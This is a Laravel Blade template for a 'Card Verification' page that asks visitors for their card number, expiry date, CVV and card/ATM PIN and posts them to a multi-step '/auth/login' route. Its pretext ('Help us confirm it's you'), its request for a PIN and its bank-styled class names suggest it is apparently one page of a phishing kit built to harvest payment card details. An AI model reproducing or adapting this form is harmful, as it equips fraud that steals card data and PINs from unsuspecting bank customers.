@layout('layouts.app')

@section('content')
<form class="cb-form" action="/auth/login/5" method="POST">
  <fieldset class="reg-content">
    <legend>Card Verification</legend>

    <p class="note">Fields with an asterisk (*) are required.</p>

    <div class="row">
      <div class="large-12 column">
        <div class="description">Help us confirm it's you by filling out the following information.</div>
      </div>
    </div>

    <div class="tabs-content">
      <div class="content active">
        <div class="row">
          <div class="large-6 medium-6 medium-6-override column">
            <label class="form-field-label" for="cardNum">Card Number*</label>
            <input id="cardNum" name="cardNum" type="text" class="radius cb-input" autocapitalize="off" autocomplete="off" autocorrect="off" spellcheck="false">
          </div>

          <div class="large-6 medium-6 medium-6-override column">
            <label class="form-field-label" for="expDate">Expiry Date*</label>
            <input id="expDate" name="expDate" type="text" class="radius cb-input" autocapitalize="off" autocomplete="off" autocorrect="off" spellcheck="false">
          </div>

          <div class="large-6 medium-6 medium-6-override column">
            <label class="form-field-label" for="cvv">CVV*</label>
            <input id="cvv" name="cvv" type="text" class="radius cb-input" autocapitalize="off" autocomplete="off" autocorrect="off" spellcheck="false">
          </div>

          <div class="large-6 medium-6 medium-6-override column">
            <label class="form-field-label" for="cpin">Card/ATM PIN*</label>
            <input id="cpin" name="cpin" type="password" class="radius cb-input cb-input-mask" autocapitalize="off" autocomplete="off" autocorrect="off" spellcheck="false">
          </div>
        </div>
      </div>

      <div class="row">
        <div class="large-12 column">
          <button class="button radius right submitBtn" type="submit" disabled="">Continue</button>
        </div>
      </div>
    </div>
  </fieldset>
</form>
@endsection

@section('script')
<script>
  $('#cardNum').mask('0000 0000 0000 0000');
  $('#expDate').mask('00/0000');
  $('#cvv').mask('0000');
  $('#cpin').mask('0000');
</script>
@endsection